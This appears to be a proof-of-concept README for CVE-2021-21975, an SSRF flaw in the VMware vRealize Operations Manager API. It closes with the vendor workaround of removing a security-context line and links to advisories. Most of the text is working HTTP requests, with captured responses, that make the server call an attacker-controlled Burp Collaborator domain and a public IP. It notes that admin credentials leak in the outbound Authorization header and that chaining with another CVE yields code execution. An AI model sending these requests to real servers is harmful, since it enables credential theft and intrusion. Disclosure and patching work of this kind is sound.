CVE-2021-21975 PoC — VMware vRealize Operations 代码问题漏洞

Source

Associated Vulnerability

Description

[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)

Readme

<b>[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
vRealize Operations (vROps) is a tool that self-driving IT operations management powered by AI from apps to infrastructure to optimize, plan and scale VMware Cloud and HCI deployments while unifying public cloud monitoring. VMware vRealize Operations Manager API `8.4 and all previous versions` are vulnerable to Server Side Request Forgery (SSRF) vulnerability. Successfully exploitation of this vulnerability may lead to read or update internal resources and also in this case, an attacker can easily steal administrative credentials of vROps server. With combining `CVE-2021-21975` and `CVE-2021-21983`, an attacker can run arbitrary code on remote vRealize Operations server.

<b>Proof of Concept (PoC):</b> In order to exploit this vulnerability, you can use the following request
```
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close

[
  "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]
```
Response of the above request is down below
```
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151

[
  {
    "address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
    "thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
  }
]
```
<img width="1423" alt="Screen Shot 2021-04-03 at 01 03 29" src="https://user-images.githubusercontent.com/16391655/113457482-89629f80-9418-11eb-9b04-5b27e04868f4.png">
<img width="655" alt="Screen Shot 2021-04-03 at 01 18 07" src="https://user-images.githubusercontent.com/16391655/113458487-14449980-941b-11eb-8287-9b2760919413.png">

Also administrative credentials are disclosures in `Authorization` header.

<img width="1599" alt="Screen Shot 2021-04-03 at 01 19 39" src="https://user-images.githubusercontent.com/16391655/113458525-38a07600-941b-11eb-98c3-11d402ba2214.png">
<img width="538" alt="Screen Shot 2021-04-03 at 01 24 34" src="https://user-images.githubusercontent.com/16391655/113459157-3f2fed00-941d-11eb-927f-1348cde965d2.png">

<b>Other Proof of Concepts (PoCs):</b> Or you can use the following requests to detect CVE-2021-21975 VMware vRealize Operations Manager API Server Side Request Forgery (SSRF) vulnerability

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000/CVE-2021-21975"
]
```

```
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67

[
  {
    "address":"78.171.203.41:8000/CVE-2021-21975",
    "thumbprint":null
  }
]
```
<img width="1207" alt="Screen Shot 2021-04-03 at 00 00 20" src="https://user-images.githubusercontent.com/16391655/113459054-009a3280-941d-11eb-996e-c54cfc2cba74.png">

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000"
]
```

```
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52

[
  {
    "address":"78.171.203.41:8000",
    "thumbprint":null
  }
]
```
<img width="551" alt="Screen Shot 2021-04-03 at 00 01 00" src="https://user-images.githubusercontent.com/16391655/113459621-b914a600-941e-11eb-901f-ee4212642a8b.png">

<b>Workaround Solution:</b> If the patch cannot be installed, or there is no patch for your version of vRealize Operations, the following steps can be taken to workaround the issue. There is no impact to vRealize Operations when applying this workaround.

To work around this issue in vRealize Operations, remove a configuration line from `casa-security-context.xml`

1. Log into the Primary node as root via SSH or Console, pressing ALT+F1 in a Console to log in
2. Open `/usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml`
3. Find and remove the line: `<sec:http pattern="/nodes/thumbprints" security='none'/>`
4. Save and close the file
5. Restart the CaSA service with this command: `service vmware-casa restart`
6. Repeat steps 1-5 on all other nodes in the vRealize Operations cluster.

For more information, visit the following pages.

[https://kb.vmware.com/s/article/83210](https://kb.vmware.com/s/article/83210)<br>
[https://www.vmware.com/security/advisories/VMSA-2021-0004.html](https://www.vmware.com/security/advisories/VMSA-2021-0004.html)<br>
[https://f5.pm/go-66465.html](https://f5.pm/go-66465.html)

File Snapshot

 [4.0K]  /data/pocs/c77a219c40171a3573a3765bf7090b7f2aa82b76
└── [5.6K]  README.md

0 directories, 1 file

Remarks